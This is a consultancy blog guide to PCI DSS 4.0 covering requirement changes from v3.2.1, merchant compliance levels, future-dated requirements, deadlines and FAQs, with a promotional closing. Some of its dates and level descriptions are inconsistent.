What is PCI DSS 4.0: Is This Still Applicable For 2024?

The Payment Card Industry Data Security Standard (PCI DSS), developed by the PCI Security Standards Council, empowers organisations to safeguard cardholder data globally. The Payment Card Industry Data Security Standard (PCI DSS) provides a framework for organisations to safeguard cardholder data. PCI DSS 4.0, a significant update since 2013 released in March 2022, introduces enhanced security measures (64 new objective-based requirements) and a more flexible approach to compliance.

This guide provides a comprehensive overview of PCI DSS 4.0, its key requirements, and how it helps businesses protect payment card information in 2025 and beyond.

What is PCI DSS v4.0 compliance?

PCI DSS v4.0 compliance refers to the official update to the PCI Data Security Standard, published in March 2022. This version reflects feedback from over 200 organizations and introduces a more adaptable, risk-based approach to securing payment card data.

It emphasises continuous monitoring, proactive risk management, and a customized approach to achieving and maintaining a strong security posture across the entire payment ecosystem.  

PCI DSS v3.2.1 to v4.0: What changes were made to the PCI DSS requirements?

Several requirements were updated when PCI DSS version 4.0 was released on March 31, 2022. The transition period for PCI DSS version 3.2.1 will last until March 31, 2024. After that date, PCI DSS version 4.0 will be the only active version of the standard.

For PCI DSS version 4 audits, all eligible organisations must complete risk assessments at least annually. Here is a rundown of changes in requirements:

Requirement 1 – Install and maintain network security controls

PCI DSS v4.0 update requirement 1 of PCI DSS version v3.2.1 by broadening the focus from firewalls and routers to network security controls.

Key changes included in v4.0 include:

• Defining roles and responsibilities for network management components.
• Establishing network security controls configuration standards and reviewing them half-yearly.
• Clarifying security countermeasures between wireless networks and the Cardholder Data Environment (CDE).
• Strengthening controls between trusted and untrusted networks, including restrictions on inbound traffic from untrusted networks.

Requirement 2 – Apply Secure Configurations to All System Components

Here, the title has been revised to focus on the overall secure configurations. Also, the PCI DSS version 4.0 explains guidance for previous requirements 2.1, 2.4, and 2.6, focusing on the following:

• Managing vendor default accounts.
• Ensuring secure configurations beyond vendor default settings.
• Distinguishing primary functions that require different security levels.
• Identifying insecure services, protocols, or daemons.

Requirement 3 – Protect Stored Account Data

The principal requirement title has been updated for account data security, emphasising the importance of protecting sensitive data. The key changes in PCI DSS v4.0 include but are not limited to the following:

• Implementing data retention and disposal policies for sensitive authentication data (SAD) stored before authorisation and encrypting them.
• Masking the PAN while displayed allows only personnel with a legitimate business to see more than the BIN and last four digits.
• Preventing the copying or relocation of the PAN during remote access.
• Using cryptographic hashes, disk-level or partition-level encryption to render the PAN unreadable on removable and non-removable media
• Documenting cryptographic architecture to ensure the same cryptographic keys are not used in both production and testing environments. The requirement title has been revised to highlight the importance of strong cryptography and to improve the protection of card data during transmission.

Requirement 4 – Protect Cardholder Data with Strong Cryptography During Transmission Over Open, Public Networks.

One change in this requirement relates to 4.2 is to ensure roles and responsibilities for performing activities in Requirement 4 are declared, understood and documented by the organisation.

Requirement 5 – Protect All Systems and Networks from Malicious Software

It divides the former PCI DSS requirement into three focus areas:

• Keeping the antivirus/malware system up-to-date.
• Performing continuous behavioural as well aslysis, and periodic and real-time scans.
• Generating audit logs from the malware solution.

The new PCI DSS version also introduced significant changes to establish roles and responsibilities for malware protection, define the frequency of periodic malware scans in the targeted risk analysis, implement a malware solution for removable media, and introduce measures to detect and protect against phishing attacks.

Requirement 6 – Develop and Maintain Secure Systems and Software

The changes from PCI DSS v3.2.1 to PCI DSS v4.0 for Requirement 6 include but are not limited to

• Integrating secure software development lifecycle.
• Regular security testing to identify vulnerabilities and missing security controls.
• Security configurations for all system components.
• Prompt patch management and remediation.
• Utilising threat intelligence to enhance security posture.
• Documenting security processes and activities related to system development and maintenance.

Requirement 7 – Restrict Access to System Components and Cardholder Data by Business Need to Know

This PCI DSS requirement includes new roles and responsibilities for access management, clarifications on least privilege principles, removal of some documented procedures, and a definition of the access control model.

Requirement 8 – Identify Users and Authenticate Access to System Components

This requirement uses the terms “authentication factor” and “authentication credentials” while removing the term “non-consumer users” to clarify that they do not apply to consumer accounts. It also demonstrates authentication processes, defines evaluation frequencies related to multi-factor authentication factors, and implements securely shared authentication credentials on an exception basis.

Also, multi-factor authentication (MFA) is required for all access to the CDE, alongside other measures to restrict access, restrict physical access and protect against password/passphrase misuse.

Requirement 9 – Restrict Physical Access to Cardholder Data

This update clarifies Requirement 9 for sensitive areas of CDE. Key changes include defining the requirements for secure systems’ applicability to the CDE, establishing new roles and responsibilities for v4.0 assessments, and mandating the locking of consoles in sensitive environments when not in use.

Requirement 10 – Log and Monitor All Access to System Components and Cardholder Data

New roles and responsibilities have been introduced and are immediately effective for all Pand assessments, and a few redundant requirements have been removed.

Key changes for the PCI DSS compliance include a title revision to highlight audit logs, clarifying that the requirements do not apply to consumer user activity, and replacing “audit trails” with “audit logs” throughout. It also requires critical security controls failure identification and detection, which apply to all entities.

Requirement 11 – Test the Security of Systems and Networks Regularly

The principal requirement title has been updated to explain wireless access point management. The key changes in the new PCI DSS version include but are not limited to the following:

• Defining roles and responsibilities for wireless access point management, effective immediately for v4.0 assessments.
• Separating internal and external vulnerability scans into distinct requirements with clear documentation and retention guidelines, multi-tenant service providers or third-party service providers must support external penetration testing. The responsibilities of service providers will include continuous monitoring of their cloud environment to identify security risks and vulnerabilities.

Requirement 12 – Support Information Security with Organizational Policies and Programs

The title of this requirement has been updated to highlight organisational policies that support information security. To adopt a focused approach towards assessments, formal risk assessment has now been replaced with targeted risk analysis. A few clarifications on acceptable use policies have been added for end-user technologies. Additionally, annual documentation and cryptographic protocols are necessary now, and third-party service providers must validate the PCI DSS scope half-yearly.

How to become PCI 4.0 compliant?

To comply with PCI DSS, businesses must first understand their compliance level first. The PCI DSS categorises merchants into four levels based on their annual card transaction volume.

Level 1: Merchants processing over 6 million transactions per year.

Level 2: Merchants processing between 1 to 6 million transactions per year.

Level 3: Merchants processing between 20,000 to 1 million transactions per year.

Level 4: Merchants processing fewer than 20,000 transactions per year.

Understand compliance level requirements

Level 1: Merchants in Level 1 are required to undergo an external audit conducted by a Qualified Security Assessor (QSA) or Internal Security Assessor (ISA). This audit includes on-site assessments to validate the scope, review documentation, and confirm whether PCI DSS requirements are being met. Upon completion, a Report on Compliance (RoC) is submitted to demonstrate PCI compliance.

Level 2-4: Merchants in Levels 2 to 4 do not require an external audit. However, all merchants, regardless of their level, must complete a Self-Assessment Questionnaire (SAQ) and submit quarterly reports. Level 2 merchants are additionally required to submit a RoC.

Implement PCI requirements

One of the core components of PCI DSS v4.0 compliance is fulfilling the 12 requirements, which include, but are not limited to, implementing a firewall to secure the network hosting the cardholder data environment, establishing robust password policies to prevent unauthorised access, ensuring the encryption of cardholder data both at rest and in transit, and implementing access control measures based on the principle of least privilege.

Also, maintaining logs and monitoring user activity is essential for tracking access and changes. Conducting vulnerability scans and penetration tests helps identify critical vulnerabilities in the overall payment environment, among other important requirements.

Develop and follow plans of action

Develop an action plan to implement and address compliance gaps. Apply required security measures, review them, update processes and policies, and monitor the progress to ensure you meet the PCI DSS requirements.

Regular audits, risk assessments, and VAPT will help identify critical vulnerabilities and document findings for risk remediation based on the internal vulnerability triage process. Our security consultants are adept at supporting such processes, feel free to schedule a free consultation to prepare for your compliance journey.

Complete Self-Assessment questionnaires (SAQ)

As mentioned earlier, level 2-4 merchants or businesses are required to submit a Self-Assessment Questionnaire (SAQ). The SAQ is available on the PCI Security Standards Council (PCI SSC) website and consists of a series of yes-or-no questions. These self-assessment questionnaires evaluate whether the requirements set by the PCI DSS are being met or not. Businesses can complete this self-assessment independently or may choose to file it through a certified Qualified Security Assessor (QSA).

File a Formal Attestation of Compliance (AOC)

Once all security gaps are addressed and controls are implemented, a Level 1 merchant must undergo an audit conducted by third-party service providers or Qualified Security Assessor (QSA) to complete the Report on Compliance (RoC) and verify their compliance. After completing the Self-Assessment Questionnaires (SAQ) and conducting a vulnerability scan with a PCI Security Standards Council (PCI SSC) Approved Scanning Vendor (ASV), businesses can file an Attestation of Compliance (AoC) with the PCI Security Standards Council (PCI SSC) to confirm that they have met the PCI DSS requirements and are compliant.

Consequences of PCI DSS non-compliance

PCI DSS is an integral standard for every business that handles credit card transactions or payment processes, and they must comply with it. If a business fails to adhere to it, it can face significant consequences, including financial penalties, reputational damage, and potential business loss. Although PCI fines are not publicly disclosed, merchants could be charged between $5,000 and $100,000 per month until they achieve compliance.

Future-dated requirements of PCI DSS 4.0

These are best practices until March 31, 2024. After that, organisations must meet the requirement and align their security to be PCI DSS compliant – meaning these are mandatory requirements.

Requirement 3

The future dated requirement 3 of 4.0 includes:

• Data retention and disposal policies for SAD stored before authorisation and
• Encrypting SAD before authorisation.
• Mask PAN, while displayed, only shows personnel with a business need to see more than the BIN and last 4 digits.
• Prevent PAN from being copied or moved during remote access.
• Cryptographic hashes, disk-level or partition-level encryption on removable and non-removable media
• Document cryptographic architecture so the same keys are not used in production and test environments

Requirement 4

Two new requirements in this area:

• This one ensures that PAN transmissions over open, public networks are valid and do not expire or be revoked.
• It also emphasises maintaining an inventory of trusted keys and certificates.

Requirement 5

The following actions are essential in the future for requirement 5 to maintain a secure environment:

• Implement a focused risk analysis to determine the frequency of periodic evaluations for system components identified as being at minimal risk of malware.
• Perform a targeted risk analysis to determine the frequency of periodic malware scans.
• Conduct anti-malware scans when using removable electronic media.
• Implement mechanisms to detect and protect personnel against phishing attacks.

Requirement 6

This is about software management for security. You need to do the following to be PCI DSS compliant:

• Keep an inventory of custom and bespoke software to enable vulnerability and patch management.
• Deploy an automated technical solution for public-facing web applications to detect and prevent web attacks in real-time.
• Manage all payment page scripts loaded and executed in the customer’s browser for security and compliance.

Requirement 7

This is about regular reviews of user accounts and access privileges for security. You need to do the:

• Review all user accounts and their associated access privileges thoroughly. Application and system accounts should be assigned and managed correctly.
• Review all account access by application and system and their access privileges for a secure environment.

Requirement 8

The future Requirement 8 is about strong authentication for access to sensitive data. You need to do the following:

• Establish a minimum complexity requirement for passwords used as an authentication factor. If passwords or passphrases are the sole method of authentication, they must be updated every 90 days. Alternatively, the account’s security can be assessed dynamically for real-time access.
• Multi-factor authentication for all access to the CDE and multi-factor authentication systems should be integrated.
• Interactive logins for application and system accounts protect passwords and passphrases from misuse.

Requirement 9

This PCI DSS requirement is about regular inspections and targeted risk analysis for Point of Interaction (POI) devices.

Requirement 10

This Requirement 10 focuses on audit log management for the integrity and security of systems. You need to implement these measures:

• Automate audit log reviews to enhance efficiency and accuracy.
• Conduct a targeted risk analysis to determine the frequency of log reviews for all other system components.
• Promptly detect, alert, and address failures of critical security control systems.
• Ensure that responses to failures of critical security control systems are initiated without delay.

Requirement 11

Requirement 11 requires organisations to demonstrate comprehensive security measures to effectively manage vulnerabilities across the hardware and software assets, including those not critical or high risk for the organisation. These include the following items:

• Manage all applicable vulnerabilities that are not ranked as high-risk or critical.
• Perform internal vulnerability scans using authenticated scanning methods.
• Provide support for external penetration testing through multi-tenant service providers.
• Implement detection for covert malware communication channels, including alerting, prevention, and remediation via intrusion detection and prevention techniques.
• Deploy a change-and-tamper detection mechanism specifically for payment pages.

Requirement 12

The last requirement in PCI DSS 4.0 emphasises a proactive approach to risk management and personnel training, ensuring robust protection of cardholder data through the following measures:

• Establishing a defined frequency for training incident response personnel and initiating procedures immediately upon PAN detection.
• Incorporating alerts from change and tamper detection mechanisms for payment pages to bolster incident response capabilities.
• Ensuring logical separation of access and validating the effectiveness of security controls through semi-annual penetration testing.
• Documenting and reviewing the impact of organisational changes on PCI DSS scope, with findings communicated promptly to management.
• Reviewing and updating the security awareness program annually, covering relevant threats to the CD) and guidelines for acceptable technology use.
• Assessing hardware and software technologies regularly while documenting targeted risk analyses to support compliance with PCI DSS requirements.

Timeline for PCI DSS 4.0 adoption and enforcement deadlines

Release of PCI DSS 4.0

The PCI DSS v4.0 was released in March 2022 and introduced updated requirements and guidance for securing payment account data and environments.

Organisations using the customised approach must work closely with a Qualified Security Assessor (QSA) to document chosen controls and methods. This approach is more suited for organisations with mature security programs. Customised validation is distinct from compensating controls, which require documented justification when an organisation cannot meet a specific compliance requirement. The PCI Council emphasises that the customised approach will not engage organisations in a way that allows for disengagement from assessments.

End of support for PCI DSS v3.2.1

PCI DSS 4.0 retired v3.2.1 on March 31, 2024, after which it became mandatory for businesses to achieve compliance according to the PCI DSS 4.0 requirements.

Transition period

Organisations are encouraged to familiarise themselves with the new requirements and implement appropriate modifications to their security protocols and controls concerning version 4.0 during the specified timeframe, specifically from March 2022 to March 2024. During this transitional period, organisations may adhere to either the PCI version 3.2.1 or the PCI version 4.0 standards.

Requirements deadline by PCI Security Standards Council

PCI DSS 4.0 requirements were set for the deadline of 31st Dec 2024.

What are the PCI DSS 4.0 requirements?

PCI DSS 4.0 consists of 12 requirements applicable to all businesses handling credit card data or payment processes within the PCI scope. It includes systems that store, process or transmit cardholder data (CHD) and sensitive authentication data (SAD). The new requirements add more security controls to protect payment card data and help merchants, banks, and financial institutions stay compliant. Some are effective immediately; most are due by March 31, 2025.

1. Build and maintain a secure network

Requirement 1: Install and maintain a firewall configuration to protect cardholder data.

Firewalls are essential to creating barriers and are the first line of defence between internal and external networks. The PCI DSS 4.0 requirement mandates organisations to install and configure firewalls to restrict unauthorised access and ensure regular monitoring to protect cardholder data.

Requirement 2: Do not use vendor-supplied defaults for system passwords and other security parameters.

Default passwords are one of the common reasons behind many data breaches, as they are easy to guess and publicly available. Organisations need to change default passwords and settings before using them in their PCI environment.

2. Protect cardholder data

Requirement 3: Protect stored data.

To prevent sensitive information, cardholder data must be protected through strong encryption, hashing, tokenisations, or any other means that suit the circumstances.

Requirement 4: Encrypt transmission of cardholder data across open, public networks.

Open and public networks pose a high risk when it comes to transiting sensitive information such as cardholder data. Therefore, to meet the PCI DSS 4.0 requirement, it is crucial to include HTTPS with TLS configuration to secure the transmission over an open, public network.

3. Maintain a vulnerability management program

Requirement 5: Use and regularly update antivirus software or programs.

Antivirus software greatly helps detect and prevent malware infection, delivery, etc. Such software ensures the PCI environment is secure and has controls to identify, detect, and block potential threats.

Requirement 6: Develop and maintain secure systems and applications.

When you build security into the foundation, you significantly reduce the attack surface, and this PCI DSS requirement addresses the same phenomenon. Regular software updates, patches, vulnerability assessments, and coding practices will ensure your application and system remain secure throughout

4. Implement strong access control measures

Requirement 7: Restrict access to cardholder data by business need-to-know.

When you grant access on a need-to-know basis, you automatically minimise the risk of unauthorised access. The requirement here mandates that businesses implement role-based access to ensure the security of the cardholder data environment (CDE).

Requirement 8: Assign a unique ID to each person with computer access.

The unique identifiers help add accountability actions and audit trails. In the long run, this is a great security control that helps track activity and identify the source of breaches.

Requirement 9: Restrict physical access to cardholder data.

Appropriate physical security controls are needed to protect cardholder data processing or storage environments. These include surveillance systems, visitor management processes, etc.

5. Regularly monitor and test networks

Requirement 10: Track and monitor all access to network resources and cardholder data.

Effective monitoring to identify security events for analysis is key to having the right alerts in place when something goes wrong. It helps to detect and respond to security incidents, improving the overall logging and monitoring controls family, boosting your security strategy.

Requirement 11: Regularly test security systems and processes.

As new zero-days are exploited every now and then, regular testing is important to ensure your system is glitch-free and has all relevant controls, such as incident response procedures, disaster recovery program, vulnerability management, etc., in place to address any issue promptly.

6. Maintain an information security policy

Requirement 12: Maintain a policy that addresses information security for all personnel.

An information security policy sets out guidelines for implementing security practices for people, processes, and technologies. To lead to positive evolutions, the business must maintain a policy that addresses topics such as data protection, acceptable usage, incident response procedures, vulnerability management, security awareness training, etc.

Achieving and Maintaining PCI DSS 4.0 Compliance

Organisations can easily comply with PCI DSS 4.0 by first assessing their current data security posture and then implementing PCI-defined controls based on the PCI 6 compliance goal. The controls include 12 requirements with actionable steps, such as using technical controls, completing a Self-Assessment Questionnaire (SAQ), conducting risk and vulnerability assessments, and implementing other security measures.

Once implemented, security monitoring systems, testing procedures, and documentation are required to maintain compliance and remediate issues as they arise.

Journey to PCI DSS 4.0 Compliance: Prioritised approach

The Prioritised Approach outlines PCI DSS requirements into six risk-based security milestones to help organisations protect sensitive authentication data, against evolving risks and threats while working to comply with PCI DSS compliance. Developed from breach data and feedback from Qualified Security Assessors, forensic investigators, and the PCI Security Standards Council Board of Advisors., it focuses on securely storing, processing, and transmitting payment account data.

1. Eliminate sensitive data storage

The first milestone concerns managing the major risk of compromised entities. It emphasises not storing sensitive authentication or other account data if there is no need for it.

2. Protect systems and networks

This milestone focuses on implementing controls at key access points to prevent compromises and establish effective incident response procedures.

3. Secure payment applications

The application and server vulnerabilities can help threat actors compromise systems and retrieve cardholder data. Therefore, it is crucial to maintain secure systems, applications and servers with appropriate security controls.

4. Monitor and manage access to your systems

This milestone focuses on implementing controls to track the activity performed in the CDE, such as who accessed your network, what actions were taken, when, and how.

5. Safeguard stored cardholder data

This one is particularly directed toward organisations that must store Primary Account Numbers (PANs). It is all about implementing robust protections to secure the PANs’ data.

6. Finalise compliance efforts

This milestone ensures that all remaining PCI DSS requirements are fulfilled and that the necessary policies, procedures, and processes are completed to fully protect the CDE.

💡This article is intended for PCI DSS v4.0 read only. For updates and clarifications introduced in PCI DSS v4.0.1, refer to our dedicated guide on PCI DSS v4.0.1.

PCI DSS 4.0.1 Changes

Summary of PCI Compliance v4.0

PCI DSS 4.0 significantly evolves payment card data security, emphasizing a more flexible, risk-based approach. Key updates include enhanced requirements for network security, strong cryptography, physical access control, vulnerability management, and security awareness training. Understanding these requirements and implementing the necessary controls is crucial for maintaining compliance and safeguarding your business.

Annual PCI DSS Testing with Cyphere

Regular security assessments, including penetration testing and vulnerability scanning, are vital for maintaining PCI DSS compliance and identifying potential weaknesses in your security posture. Cyphere can help you navigate the complexities of PCI DSS 4.0 and ensure your systems are secure.  

Contact us or book a call for a PCI DSS compliance consultation. It’s a great opportunity to discuss your concerns and collaborate on an action plan for PCI DSS.

FAQs PCI DSS v4.0

What are the changes for PCI compliance in 2024?

In 2024, PCI compliance saw the end of the transition period from v3.2.1 to v4.0, which concluded in March 2024.

Do we need to implement PCI DSS 4.0 now?

Since PCI DSS v3.2.1 has been retired, and v4.0 is currently active until December 31, 2024, businesses must implement v4.0 to maintain PCI DSS compliance.

When did PCI 4.0 come out?

The Payment Card Industry Security Standards Council (PCI SSC) officially published PCI DSS 4.0 in March 2022.

What is the difference between PCI 4.0 and 3.2.1?

Introduced in 2018, the PCI DSS v3.2.1 version was rigid and unable to address the evolving threat landscape of modern IT, such as cloud and serverless environments. In contrast, v4.0 offers a more customised and flexible approach to risk management through continuous monitoring, defined roles and responsibilities, strong encryption standards, and other customised security controls. It also emphasises security awareness training.

Is PCI DSS 4.0 mandatory?

Yes, it is mandatory for organisations handling payment card data to maintain PCI DSS compliance by March 31, 2025.

Should you focus on PCI 4.0 or 4.0.1 now?

If you’re starting your PCI DSS compliance journey, focus on PCI DSS v4.0 to understand its foundational principles, as v4.0.1 is a limited version with no additional or deleted PCI DSS requirements.

If you are familiar with v4.0, prioritise v4.0.1 for its significant updates and clarifications regarding the PCI DSS scope. Keep in mind that version 4.0 will be retired in December 2024. Therefore, for organizations getting ready for audits, it is crucial to comply with the latest version (v4.0.1).